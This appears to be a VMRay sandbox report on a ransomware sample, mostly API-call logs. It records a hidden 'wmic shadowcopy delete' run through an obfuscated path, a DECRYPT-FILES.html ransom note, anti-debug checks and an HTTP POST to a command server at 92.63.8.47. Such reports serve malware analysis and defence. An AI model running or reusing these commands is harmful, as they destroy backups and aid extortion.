f9dfdce8...2a74 | Sequential Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Ransomware, Trojan

test.exe

Windows Exe (x86-32)

Created at 2019-06-01T18:40:00

...

Remarks (1/1)

(0x2000002): The maximum VM disk space was reached. The analysis was terminated prematurely.

Grouped Sequential

Remarks

(0x200001f): Code in memory was overwritten during this analysis. Review corresponding VTI for more info.

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xa38 Analysis Target High (Elevated) test.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\test.exe" -
#2 0x36c RPC Server System (Elevated) svchost.exe C:\Windows\system32\svchost.exe -k netsvcs #1
#4 0xa78 Child Process High (Elevated) wmic.exe "C:\m\..\Windows\ovxhp\sff\qyv\..\..\..\system32\w\sfc\roma\..\..\..\wbem\ux\dgfg\..\..\wmic.exe" shadowcopy delete #1
#5 0xae8 RPC Server System (Elevated) wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding #2
#6 0xb08 RPC Server System (Elevated) vssvc.exe C:\Windows\system32\vssvc.exe #5

Behavior Information - Sequential View

Process #1: test.exe
9835 949
»
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\test.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:31, Reason: Analysis Target
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:44
OS Process Information
»
Information Value
PID 0xa38
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A3C
0x A48
0x A4C
0x A50
0x A54
0x A58
0x A6C
0x A70
0x A74
0x A80
0x A84
0x AD0
0x AD4
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
test.exe 0x00400000 0x00459FFF Relevant Image - 32-bit - True False
...
Hook Information
»
Type Installer Target Size Information Actions
Code test.exe:+0x32363 ntdll.dll:DbgUiRemoteBreakin+0x0 1 bytes -
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Boot\BOOTSTAT.DAT 64.26 KB MD5: 9d608e3d8417eb7c56907762c7405cfe
SHA1: 52578de1ff4b1714c9ecf46ec6bd3265b448ed55
SHA256: a56c3573e909ddf3620abce358b38ae1acfdd69d21130f39a2e5b6862f344dbb
SSDeep: 1536:2UqgOrNWMHTJxQ+jnatw5mLk4AS3rGg6R6KDX2:ygOrU2TJxQnQmLX3r88Kb2 		False
...
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi 3.02 MB MD5: 6c8cd304002ba6bd422c58e306fde103
SHA1: 5a04bebd2b4993a53649095546831170c963d01f
SHA256: 2d8fd83fc4f4c5770c4176b143df31f83d5b5d07612fc0710dcc61e70504ee21
SSDeep: 98304:95GoTKOQ7MgTjyYpjkRtrLSm9JD34TFDgU9mj:jrUTjRk791iF0UIj 		False
...
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim 161.38 MB MD5: e8a7823ba628d4c3b2dc7196fbf058bc
SHA1: c7eee2c21342743a59ee335ff525330f4d273410
SHA256: 364d5b08ed141e2cea519babf72a77285bba657d18bd2374db55bbd779d77b45
SSDeep: 196608:xlp6UMEbiZG5ygm8j3k0EHZWbVFmvVYyyZvOXWBEY+1BVQ:x+UMaigoX8zY5bVSv0YEBVQ 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst 34.55 KB MD5: 89de74772f8f5ca07afd7230d0f39b35
SHA1: a5b1fb84fe00d72e5d593e880d112b1f84a47fa1
SHA256: a6deb72e8ac69b7dde46ad14a75dae91c571ceb13de49286772ce8bb28598f4a
SSDeep: 768:B8uH1ZA7F5PgA7ao8MsLVqD8O0K/vmi53D5iEAGkVL21LFP+fE:yG/M5PgAeooLVqdur9VLSFms 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst 135.47 KB MD5: e0b7853f83dbdb26816e9bde97bfeefc
SHA1: 71ddd74cab13a317877090dfa3ae4c53b49e5a32
SHA256: 2db74a478b1f475b3a2ec965a9bf0a7ebd968d1a4189e124f04940865a8a2622
SSDeep: 3072:7ZnFaqG0actu95eRZtg5FtXtnHd3PdAzG4zZ0BH5dTRiuxLqQn4M:RFaqGhKA5C+dnHd94NgH5BxLqlM 		False
...
C:\\DECRYPT-FILES.html 6.43 KB MD5: 531773e2468abe0925223914e6e95d8b
SHA1: 844f9b65e1caf41f014d3fc7393ccf33d9a39c01
SHA256: ef84cd16c1f38d0749e5060286d624f75819940c34043e2cc3050756dbd596cd
SSDeep: 96:z2dMHJdgvOYEHdwLH+66GU2ZClg1D6A0Fl9B89HN2K3zaKo4W:sGwuHdwLH+DGURg1JAl9CHhur9 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst 52.20 KB MD5: ac013e7d8d6ca0f301f387c10eba509d
SHA1: 9668c981fb918a5333829c256d85aa645507d7b1
SHA256: 38a991403d5a297dac40971538baf4d9d86ca10ea84494735e86a2b115863ef5
SSDeep: 1536:qJB424/1d7gbOq4Eegs85FkSYxxUgtjiMgidCRCJYRDt:KB44bj4gwogz8VRh 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents 5.26 KB MD5: bd95c89d91ebc03b4d088b6cdfbc867c
SHA1: adbc196503e040d5f9641cf83d7cd09e67864014
SHA256: a0277c7ca4ed3e13dedc950b6041c098cc8d8b5302e8ad8c25dc49b4495a8ad6
SSDeep: 96:soMHwaw9ZFoBV2N20l3LtdSoVvlsThwVyUOCaRpMzrQC8DdoXPpgLIiz2Z5E:soMHEFoBANDVZMesTh4yUOPvMzrz8Dd5 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin 75.92 KB MD5: 8e9a56be470565a4c272341041e708fa
SHA1: ecffc9227c20121ec401661afcc7b76d6bd9dd8f
SHA256: eed9af6b4e4ae888c60631707c1b65f21a06f4561ce25fb342daa8ac32334fa3
SSDeep: 1536:dmsdtkU2OS8u5mh8MS6EjLoTTPFBWBF7UKxvZ87+nCTh51/1HP9om+EwuYD:dTtaOS8uUhvS6woTz+BF7RxvAgC3OmO7 		False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Boot\BOOTSTAT.DAT 64.26 KB MD5: 9d608e3d8417eb7c56907762c7405cfe
SHA1: 52578de1ff4b1714c9ecf46ec6bd3265b448ed55
SHA256: a56c3573e909ddf3620abce358b38ae1acfdd69d21130f39a2e5b6862f344dbb
SSDeep: 1536:2UqgOrNWMHTJxQ+jnatw5mLk4AS3rGg6R6KDX2:ygOrU2TJxQnQmLX3r88Kb2 		False
...
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi 3.02 MB MD5: 6c8cd304002ba6bd422c58e306fde103
SHA1: 5a04bebd2b4993a53649095546831170c963d01f
SHA256: 2d8fd83fc4f4c5770c4176b143df31f83d5b5d07612fc0710dcc61e70504ee21
SSDeep: 98304:95GoTKOQ7MgTjyYpjkRtrLSm9JD34TFDgU9mj:jrUTjRk791iF0UIj 		False
...
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim 161.38 MB MD5: e8a7823ba628d4c3b2dc7196fbf058bc
SHA1: c7eee2c21342743a59ee335ff525330f4d273410
SHA256: 364d5b08ed141e2cea519babf72a77285bba657d18bd2374db55bbd779d77b45
SSDeep: 196608:xlp6UMEbiZG5ygm8j3k0EHZWbVFmvVYyyZvOXWBEY+1BVQ:x+UMaigoX8zY5bVSv0YEBVQ 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst 34.55 KB MD5: 89de74772f8f5ca07afd7230d0f39b35
SHA1: a5b1fb84fe00d72e5d593e880d112b1f84a47fa1
SHA256: a6deb72e8ac69b7dde46ad14a75dae91c571ceb13de49286772ce8bb28598f4a
SSDeep: 768:B8uH1ZA7F5PgA7ao8MsLVqD8O0K/vmi53D5iEAGkVL21LFP+fE:yG/M5PgAeooLVqdur9VLSFms 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst 135.47 KB MD5: e0b7853f83dbdb26816e9bde97bfeefc
SHA1: 71ddd74cab13a317877090dfa3ae4c53b49e5a32
SHA256: 2db74a478b1f475b3a2ec965a9bf0a7ebd968d1a4189e124f04940865a8a2622
SSDeep: 3072:7ZnFaqG0actu95eRZtg5FtXtnHd3PdAzG4zZ0BH5dTRiuxLqQn4M:RFaqGhKA5C+dnHd94NgH5BxLqlM 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst 52.20 KB MD5: ac013e7d8d6ca0f301f387c10eba509d
SHA1: 9668c981fb918a5333829c256d85aa645507d7b1
SHA256: 38a991403d5a297dac40971538baf4d9d86ca10ea84494735e86a2b115863ef5
SSDeep: 1536:qJB424/1d7gbOq4Eegs85FkSYxxUgtjiMgidCRCJYRDt:KB44bj4gwogz8VRh 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents 5.26 KB MD5: bd95c89d91ebc03b4d088b6cdfbc867c
SHA1: adbc196503e040d5f9641cf83d7cd09e67864014
SHA256: a0277c7ca4ed3e13dedc950b6041c098cc8d8b5302e8ad8c25dc49b4495a8ad6
SSDeep: 96:soMHwaw9ZFoBV2N20l3LtdSoVvlsThwVyUOCaRpMzrQC8DdoXPpgLIiz2Z5E:soMHEFoBANDVZMesTh4yUOPvMzrz8Dd5 		False
...
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin 75.92 KB MD5: 8e9a56be470565a4c272341041e708fa
SHA1: ecffc9227c20121ec401661afcc7b76d6bd9dd8f
SHA256: eed9af6b4e4ae888c60631707c1b65f21a06f4561ce25fb342daa8ac32334fa3
SSDeep: 1536:dmsdtkU2OS8u5mh8MS6EjLoTTPFBWBF7UKxvZ87+nCTh51/1HP9om+EwuYD:dTtaOS8uUhvS6woTz+BF7RxvAgC3OmO7 		False
...
Threads
Thread 0xa3c
251 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Thread 0xa48
4085 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Process Enumerate Processes - True 2
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Process Enumerate Processes - True 50
Fn
Process Enumerate Processes - False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Debug Check for Presence c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe True 48
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74d40000 True 1
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
Debug Check for Presence c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74d40000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = ProductName, data = 87 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x755e0000 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
System Get Time type = Ticks, time = 118077 True 1
Fn
Mutex Create mutex_name = 9cda09f29c354b42 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
File Create filename = C:\ProgramData\foo.db, desired_access = GENERIC_READ False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
File Create filename = C:\ProgramData\foo.db, desired_access = GENERIC_WRITE True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
System Get Time type = Ticks, time = 118825 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Wow64DisableWow64FsRedirection, address_out = 0x76c4d650 True 1
Fn
Process Create process_name = C:\m\..\Windows\ovxhp\sff\qyv\..\..\..\system32\w\sfc\roma\..\..\..\wbem\ux\dgfg\..\..\wmic.exe, os_pid = 0xa78, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Wow64RevertWow64FsRedirection, address_out = 0x76c4d668 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
System Sleep duration = -1 (infinite) False 1
Fn
Thread 0xa6c
201 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 17
Fn
Thread 0xa70
2257 949
»
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 118155 True 3
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 92.63.8.47, remote_port = 80 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 512, size_out = 512 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko True 1
Fn
Inet Open Connection protocol = http, server_name = 92.63.8.47, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /archive/fxc.action?sdp=q&g=6oix0&qbaa=6b&k=u7a7u True 1
Fn
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko, Host: 92.63.8.47, Content-Type: application/x-www-form-urlencoded, Content-Length: 247, Connection: Keep-Alive, url = 92.63.8.47/archive/fxc.action?sdp=q&g=6oix0&qbaa=6b&k=u7a7u True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
